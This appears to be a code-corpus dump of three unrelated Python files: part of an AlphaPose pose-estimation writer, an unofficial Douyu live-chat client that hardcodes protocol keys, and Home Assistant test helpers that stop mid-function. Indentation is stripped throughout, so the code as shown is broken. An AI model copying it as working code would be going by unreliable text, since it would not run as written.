if self.save_video:
self.stream.release()
return
# otherwise, ensure the queue is not empty
if not self.Q.empty():
(boxes, scores, hm_data, pt1, pt2, orig_img, im_name) = self.Q.get()
orig_img = np.array(orig_img, dtype=np.uint8)
if boxes is None:
if opt.save_img or opt.save_video or opt.vis:
img = orig_img
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
if opt.matching:
preds = getMultiPeakPrediction(
hm_data, pt1.numpy(), pt2.numpy(), opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
result = matching(boxes, scores.numpy(), preds)
else:
preds_hm, preds_img, preds_scores = getPrediction(
hm_data, pt1, pt2, opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
result = pose_nms(
boxes, scores, preds_img, preds_scores)
result = {
'imgname': im_name,
'result': result
}
self.final_result.append(result)
if opt.save_img or opt.save_video or opt.vis:
img = vis_frame(orig_img, result)
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
time.sleep(0.1)
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
return not self.Q.empty()
def save(self, boxes, scores, hm_data, pt1, pt2, orig_img, im_name):
# save next frame in the queue
self.Q.put((boxes, scores, hm_data, pt1, pt2, orig_img, im_name))
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
time.sleep(0.2)
def results(self):
# return final result
return self.final_result
def len(self):
# return queue len
return self.Q.qsize()
class Mscoco(data.Dataset):
def __init__(self, train=True, sigma=1,
scale_factor=(0.2, 0.3), rot_factor=40, label_type='Gaussian'):
self.img_folder = '../data/coco/images' # root image folders
self.is_train = train # training set or test set
self.inputResH = opt.inputResH
self.inputResW = opt.inputResW
self.outputResH = opt.outputResH
self.outputResW = opt.outputResW
self.sigma = sigma
self.scale_factor = scale_factor
self.rot_factor = rot_factor
self.label_type = label_type
self.nJoints_coco = 17
self.nJoints_mpii = 16
self.nJoints = 33
self.accIdxs = (1, 2, 3, 4, 5, 6, 7, 8,
9, 10, 11, 12, 13, 14, 15, 16, 17)
self.flipRef = ((2, 3), (4, 5), (6, 7),
(8, 9), (10, 11), (12, 13),
(14, 15), (16, 17))
def __getitem__(self, index):
pass
def __len__(self):
pass
def crop_from_dets(img, boxes, inps, pt1, pt2):
'''
    Crop humans from the original image according to the detection results
'''
imght = img.size(1)
imgwidth = img.size(2)
tmp_img = img
tmp_img[0].add_(-0.406)
tmp_img[1].add_(-0.457)
tmp_img[2].add_(-0.480)
for i, box in enumerate(boxes):
upLeft = torch.Tensor(
(float(box[0]), float(box[1])))
bottomRight = torch.Tensor(
(float(box[2]), float(box[3])))
ht = bottomRight[1] - upLeft[1]
width = bottomRight[0] - upLeft[0]
scaleRate = 0.3
upLeft[0] = max(0, upLeft[0] - width * scaleRate / 2)
upLeft[1] = max(0, upLeft[1] - ht * scaleRate / 2)
bottomRight[0] = max(
min(imgwidth - 1, bottomRight[0] + width * scaleRate / 2), upLeft[0] + 5)
bottomRight[1] = max(
min(imght - 1, bottomRight[1] + ht * scaleRate / 2), upLeft[1] + 5)
try:
inps[i] = cropBox(tmp_img.clone(), upLeft, bottomRight, opt.inputResH, opt.inputResW)
except IndexError:
print(tmp_img.shape)
print(upLeft)
print(bottomRight)
print('===')
pt1[i] = upLeft
pt2[i] = bottomRight
return inps, pt1, pt2
|
douyu_danmaku_assistant.py
|
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import socket
import struct
import hashlib
import threading
import urllib
import urllib2
import json
import uuid
import time
import sys
import re
__author__ = 'JingqiWang'
reload(sys)
sys.setdefaultencoding('utf-8')
def welcome():
def filter_tag(tag):
return tag.name == 'a' and tag.has_attr('href') and tag.has_attr('title') and tag.get('href').count('/') == 1 and 'directory' not in tag.get('href') and len(tag.get('href')) > 1
rooms = []
url = 'http://www.douyutv.com/directory/all'
request = urllib2.Request(url)
response = urllib2.urlopen(request)
page = response.read()
soup = BeautifulSoup(page, 'html.parser')
cnt = 1
for item in soup.find_all(filter_tag):
roomid = item['href'][1:]
title = item['title']
category = item.find_all('span', class_='tag ellipsis')[0].text
ownername = item.find_all('span', class_='dy-name ellipsis fl')[0].text
rooms.append({'id': cnt, 'rid': roomid, 'title': title, 'oname': ownername, 'cate': category})
print '\033[1m%s. 房间号: %s, 房间名: %s, 主播:\033[0m \033[1;31m%s\033[0m, \033[1m分类: %s\033[0m' % (cnt, roomid, title, ownername, category)
print '-' * 100
cnt += 1
return cnt, rooms
class DouyuDanmakuClient:
def __init__(self, cnt, rooms):
self.devid, self.gid, self.rid, self.rt, self.username, self.vk = None, None, None, None, None, None
self.cnt = cnt
self.rooms = rooms
self.danmaku_host = '111.161.35.131'
self.danmaku_port = 8601
self.danmaku_auth_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.danmaku_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.danmaku_socket.connect((self.danmaku_host, self.danmaku_port))
def run(self):
self.login()
t_keeplive = threading.Thread(target=self.keeplive)
t_keeplive.setDaemon(True)
t_keeplive.start()
self.get_danmaku()
def login(self):
while True:
self.rid = raw_input(u'\033[1m请输入房间号或序号: \033[0m')
if self.rid in ('exit', 'quit'):
sys.exit()
elif self.rid.isdigit() and 0 < int(self.rid) <= self.cnt - 1:
self.rid = self.rooms[int(self.rid) - 1]['rid']
url = 'http://www.douyutv.com/' + self.rid
try:
page = urllib.urlopen(url).read()
room_info = re.search('var \$ROOM = (.+);', page).group(1)
auth_servers = re.search('\"server_config\":\"(.+)\",\"', page).group(1)
auth_servers = urllib.unquote_plus(auth_servers)
auth_servers = json.loads(auth_servers)
# auth_host, auth_port = auth_servers[0]['ip'], auth_servers[0]['port']
room_info = json.loads(room_info)
self.rid = room_info['room_id']
self.danmaku_auth_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.danmaku_auth_socket.connect((auth_servers[0]['ip'], int(auth_servers[0]['port'])))
self.send_auth_loginreq_msg()
response = self.danmaku_auth_socket.recv(65535)
if re.search('\/live_stat@=(.+?)\/is_illegal', response).group(1) == '0':
print u'\033[1;31m[错误] 啊哦,主播正在赶来的路上,先去其他的房间打个酱油吧...\033[0m'
continue
else:
self.username = re.search('\/username@=(.+)\/nickname', response).group(1)
response = self.danmaku_auth_socket.recv(65535)
self.gid = re.search('\/gid@=(\d+)\/', response).group(1)
self.send_qrl_msg()
response = self.danmaku_auth_socket.recv(65535)
self.send_auth_keeplive_msg()
# response = self.danmaku_auth_socket.recv(65535)
break
except:
print u'\033[1;31m[错误] 请输入正确的房间号\033[0m'
def get_danmaku(self):
self.send_loginreq_msg()
response = self.danmaku_socket.recv(65535)
self.send_joingroup_msg()
# response = self.danmaku_socket.recv(65535)
while True:
response = self.danmaku_socket.recv(65535)
try:
dtype = re.search('type@=(.+?)\/', response).group(1)
except:
print '\033[1;31m[错误] 啊哦,出现了未知错误...\033[0m'
continue
if dtype == 'error':
print '\033[1;31m[错误] 啊哦,出现了未知错误...\033[0m'
elif dtype == 'upgrade':
nickname = re.search('\/nn@=(.+?)\/', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1;33m%s\033[0m \033[1m这货悄悄地升到了%s级\033[0m' % (nickname, level)
elif dtype == 'blackres':
limittime, administrator, nickname = re.search('\/limittime@=(.+)\/snick@=(.+?)/dnick(.+?)\/', response).groups()
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;33m%s\033[0m \033[1m被管理员\033[0m \033[1;31m%s\033[0m \033[1m禁言%s小时\033[0m' % (nickname, administrator, int(limittime) / 3600)
elif dtype == 'uenter':
nickname = re.search('\/nn@=(.+?)\/', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m进入房间\033[0m' % (level, nickname)
elif dtype == 'userenter':
nickname = re.search('Snick@A=(.+?)@Srg', response).group(1)
level = re.search('@Slevel@A=(.+?)@', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m进入房间\033[0m' % (level, nickname)
elif dtype == 'dgb':
gfid, number, uid, nickname = re.search('\/gfid@=(.+)\/gs@=(.+)\/uid@=(.+)\/nn@=(.+?)\/', response).groups()
level = re.search('\/level@=(.+?)\/', response).group(1)
if gfid == '50':
try:
hit = re.search('\/hits@=(.+)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个赞,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hit)
except:
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个赞\033[0m' % (level, nickname, number)
else:
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个鱼丸\033[0m' % (level, nickname, int(number) * 100)
elif dtype == 'dgn':
gfid = re.search('\/gfid@=(.+?)\/gs', response).group(1)
number, hits = re.search('\/gfcnt@=(.+?)\/hits@=(.+?)\/', response).groups()
nickname = re.search('\/src_ncnm@=(.+?)\/rid', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
if gfid == '50':
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个鱼丸,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, int(number) * 100, hits)
elif gfid == '57':
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个赞,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hits)
elif gfid == '53':
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个鱼丸,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, int(number) * 520, hits)
elif gfid == '52':
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个666,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hits)
                elif gfid == '143':
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个水晶鞋,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hits)
else:
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个不知啥礼物,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hits)
print response
elif dtype == 'onlinegift':
nickname = re.search('\/nn@=(.+?)\/ur', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
sil = re.search('\/sil@=(.+?)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m通过在线领鱼丸获得了%s个酬勤专享鱼丸\033[0m' % (level, nickname, sil)
elif dtype == 'gift_title':
print response
elif dtype == 'bc_buy_deserve':
number, hits = re.search('\/cnt@=(.+?)\/hits@=(.+?)\/', response).groups()
nickname = re.search('@Snick@A=(.+?)@', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个\033[0m\033[1;31m高级酬勤\033[0m' % (level, nickname, number)
elif dtype == 'spbc':
nickname, receiver, giftname, number = re.search('\/sn@=(.+?)\/dn@=(.+)\/gn@=(.+)\/gc@=(.+)\/drid', response).groups()
print '\033[1;36m[信息]\033[0m \033[1;32m土豪\033[0m %s \033[1m送给主播\033[0m \033[1;33m%s\033[0m \033[1m%s个\033[0m\033[1;31m%s\033[0m' % (nickname, receiver, number, giftname)
elif dtype == 'ranklist':
print response
elif dtype == 'ggbb':
print response
elif dtype == 'donateres':
print response
elif dtype == 'chatmsg':
nickname = re.search('\/nn@=(.+?)\/', response).group(1)
chatmsg = re.search('\/txt@=(.+?)\/', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;34m[弹幕]\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s:\033[0m \033[1;35m%s\033[0m' % (level, nickname, chatmsg)
elif dtype == 'chatmessage':
nickname = re.search('\/snick@=(.+?)\/cd', response).group(1)
chatmsg = re.search('\/content@=(.+?)\/snick', response).group(1)
try:
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;34m[弹幕]\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s:\033[0m \033[1;35m%s\033[0m' % (level, nickname, chatmsg)
except:
# print response
level = re.search('@Slevel@A=(.+?)@', response).group(1)
print '\033[1;34m[弹幕]\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s:\033[0m \033[1;35m%s\033[0m' % (level, nickname, chatmsg)
else:
print '\033[1;31m[错误] 主播有毒,这条消息未能解析\033[0m'
print response
def send_joingroup_msg(self):
data = 'type@=joingroup/rid@=%s/gid@=%s/' % (self.rid, self.gid)
self.danmaku_socket.sendall(self.pack_data(data))
def send_loginreq_msg(self):
data = 'type@=loginreq/username@=/password@=/roomid@=%s/' % self.rid
self.danmaku_socket.sendall(self.pack_data(data))
def send_auth_loginreq_msg(self):
self.devid = str(uuid.uuid4()).replace('-', '')
self.rt = int(time.time())
self.vk = hashlib.md5(str(self.rt) + '7oE9nPEG9xXV69phU31FYCLUagKeYtsF' + self.devid).hexdigest()
data = 'type@=loginreq/username@=/password@=/roomid@=%s/ct@=0/devid@=%s/rt@=%s/vk@=%s/ver@=20150929/' % (self.rid, self.devid, self.rt, self.vk)
self.danmaku_auth_socket.sendall(self.pack_data(data))
def send_qrl_msg(self):
data = 'type@=qrl/rid@=%s/' % self.rid
self.danmaku_auth_socket.sendall(self.pack_data(data))
def send_auth_keeplive_msg(self):
data = 'type@=keepalive/tick@=%s/vbw@=0/k@=19beba41da8ac2b4c7895a66cab81e23/' % int(time.time())
self.danmaku_auth_socket.sendall(self.pack_data(data))
def send_keeplive_msg(self):
data = 'type@=keepalive/tick@=%s/' % int(time.time())
self.danmaku_socket.sendall(self.pack_data(data))
def keeplive(self):
while True:
self.send_auth_keeplive_msg()
self.send_keeplive_msg()
time.sleep(60)
def pack_data(self, data):
length = {'len': len(data)}
return struct.pack('12B{0[len]}sB'.format(length), length['len'] + 9, 0x00, 0x00, 0x00, length['len'] + 9, 0x00, 0x00, 0x00, 0xb1, 0x02, 0x00, 0x00, data, 0x00)
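# Illustrative note (not part of the original script): the packet produced by
# pack_data() above follows the Douyu STT client-message layout, assuming a
# short payload:
#   4 bytes  payload length + 9 (one byte followed by three zero bytes)
#   4 bytes  the same length repeated
#   2 bytes  message type 0x02b1 (client-to-server)
#   2 bytes  zero padding
#   N bytes  the '@='-encoded payload, e.g. 'type@=keepalive/tick@=0/'
#   1 byte   terminating NUL
# Because the length field is packed as a single byte here, payloads longer
# than 246 bytes would not fit this format.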
if __name__ == '__main__':
rnumber, rooms = welcome()
client = DouyuDanmakuClient(rnumber, rooms)
client.run()
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import functools as ft
import json
import logging
import os
import sys
import threading
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
from io import StringIO
from unittest.mock import MagicMock, Mock, patch
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant import auth, config_entries, core as ha
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers,
permissions as auth_permissions)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import mqtt, recorder
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED, ATTR_SERVICE, DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE, EVENT_PLATFORM_DISCOVERED, EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED, SERVER_PORT, STATE_ON, STATE_OFF)
from homeassistant.helpers import (
area_registry, device_registry, entity, entity_platform, entity_registry,
intent, restore_state, storage)
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.unit_system import METRIC_SYSTEM
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
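# Illustrative sketch (not part of the original helpers): capturing calls made
# to a fake service from a synchronous test. The 'light.turn_on' service and
# entity id are made up; hass.services.call and hass.block_till_done are
# assumed to behave as in Home Assistant's synchronous API.
def _example_mock_service(hass):
    """Register a fake light.turn_on service and return its call log."""
    calls = mock_service(hass, 'light', 'turn_on')
    hass.services.call('light', 'turn_on', {'entity_id': 'light.kitchen'})
    hass.block_till_done()
    return calls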
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': date_util.as_utc(time)})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().unsubscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
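# Illustrative sketch (not part of the original helpers): a synchronous test
# can mock the MQTT stack and then inject an incoming message. The topic and
# JSON payload below are made up for the example.
def _example_fire_mqtt(hass):
    """Mock the MQTT component and fire one fake message at it."""
    mock_mqtt_component(hass)
    fire_mqtt_message(hass, 'home/sensor1', '{"temperature": 21.5}')
    hass.block_till_done()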
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[entity_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[area_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
def mock_device_registry(hass, mock_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[device_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name='Mock Group',
policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {
'name': name,
'policy': policy,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(self, id=None, is_owner=False, is_active=True,
name='Mock User', system_generated=False, groups=None):
"""Initialize mock user."""
kwargs = {
'is_owner': is_owner,
'is_active': is_active,
'name': name,
'system_generated': system_generated,
'groups': groups or [],
'perm_lookup': None,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(
policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config)
assert provider is not None, 'Invalid config specified'
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError('Provider already registered')
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
platform_schema_base=None, async_setup=None,
async_setup_entry=None, async_unload_entry=None,
async_migrate_entry=None):
"""Initialize the mock module."""
self.__name__ = 'homeassistant.components.{}'.format(domain)
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
